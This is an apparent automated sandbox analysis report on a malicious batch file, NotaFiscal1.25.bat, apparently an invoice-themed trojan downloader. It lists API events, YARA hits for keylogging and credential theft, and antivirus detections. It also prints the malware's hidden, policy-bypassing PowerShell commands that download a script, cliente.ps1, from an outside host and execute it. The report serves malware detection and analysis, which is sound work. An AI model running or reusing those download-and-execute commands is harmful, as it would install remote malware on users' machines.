NtAllocateVirtualMemory April 8, 2025, 9:13 a.m.	process_identifier: 2836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://enota.clientepj.com/cliente.ps1' -OutFile 'C:\Users\test22\AppData\Local\Temp\cliente.ps1'"
cmdline	powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\test22\AppData\Local\Temp\cliente.ps1"
cmdline	powershell -NoProfile -ExecutionPolicy Bypass -Command "if (-not (Get-Command powershell -ErrorAction SilentlyContinue)) { Write-Output 'Instalando o PowerShell...'; Install-PackageProvider -Name NuGet -Force; Install-Module -Name PowerShellGet -Force; Install-Module -Name PSReadline -Force }"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW April 8, 2025, 9:13 a.m.	thread_identifier: 2952 thread_handle: 0x00000088 process_identifier: 2948 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://enota.clientepj.com/cliente.ps1' -OutFile 'C:\Users\test22\AppData\Local\Temp\cliente.ps1'" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0
CreateProcessInternalW April 8, 2025, 9:13 a.m.	thread_identifier: 3040 thread_handle: 0x00000084 process_identifier: 3036 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\test22\AppData\Local\Temp\cliente.ps1" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 8, 2025, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 8, 2025, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 8, 2025, 9:13 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

net session

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Lionic	Trojan.Script.Agent.4!c
CTX	batch.trojan.generic
ALYac	Trojan.GenericKD.76157521
VIPRE	Trojan.GenericKD.76157521
Arcabit	Trojan.Generic.D48A1251
ESET-NOD32	PowerShell/TrojanDownloader.Agent.LQP
Avast	Other:Malware-gen [Trj]
Kaspersky	HEUR:Trojan.BAT.Agent.gen
BitDefender	Trojan.GenericKD.76157521
MicroWorld-eScan	Trojan.GenericKD.76157521
Emsisoft	Trojan.GenericKD.76157521 (B)
Ikarus	Trojan-Downloader.PowerShell.Agent
FireEye	Trojan.GenericKD.76157521
Google	Detected
Microsoft	PUA:Win32/Puwaders.C!ml
GData	Trojan.GenericKD.76157521
Varist	ABTrojan.SVXL-
Tencent	Win32.Trojan-Downloader.Downloader.Lcnw
huorong	HEUR:TrojanDownloader/PS.NetLoader.ae
AVG	Other:Malware-gen [Trj]
alibabacloud	Trojan[downloader]:Win/Agent.LRD

NotaFiscal1.25.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All